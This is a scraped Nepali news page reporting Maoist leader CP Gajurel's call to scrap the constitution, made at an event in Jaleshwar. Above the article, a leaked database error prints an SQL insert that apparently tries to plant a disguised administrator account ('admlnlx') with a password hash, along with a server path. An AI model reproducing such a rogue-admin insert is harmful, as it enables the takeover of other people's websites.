WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BI1uljC9k/nyuOSpmBOaR/90fPtcxg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-20 22:39:30', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
संविधान नै खारेज गर्नुपर्ने सिपी गजुरेलको माग – Gaule Khabar

संविधान नै खारेज गर्नुपर्ने सिपी गजुरेलको माग

संविधान नै खारेज गर्नुपर्ने सिपी गजुरेलको माग

गौशाला,मंसिर २६ –

नेकपा क्रान्तिकारी माओवादीका नेता सिपी गजुरेलले वर्तमान संविधान पूरै खारेज गर्नुपर्ने धारणा राखेका छन्।

महोत्तरी जिल्लाको सदरमुकाम जलेश्वरमा ‘राष्ट्रियता, जनतन्त्र, जनजीविका र सङ्घीयता’ विषयको अन्तक्र्रियालाई सम्बोधन गर्ने क्रममा नेता गजुरेलले वर्तमान संविधानमा मधेसी, आदिवासी जनजाति, थारु, महिला, मुसलमान, पिछडिएकालगायत कुनै पनि वर्ग र समुदायको उचित र पर्याप्त सम्बोधन नगरिएको जनाउँदै यसलाई संशोधन गरेर मात्र कसैको माग सम्बोधन नहुने विचार व्यक्त गरे । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका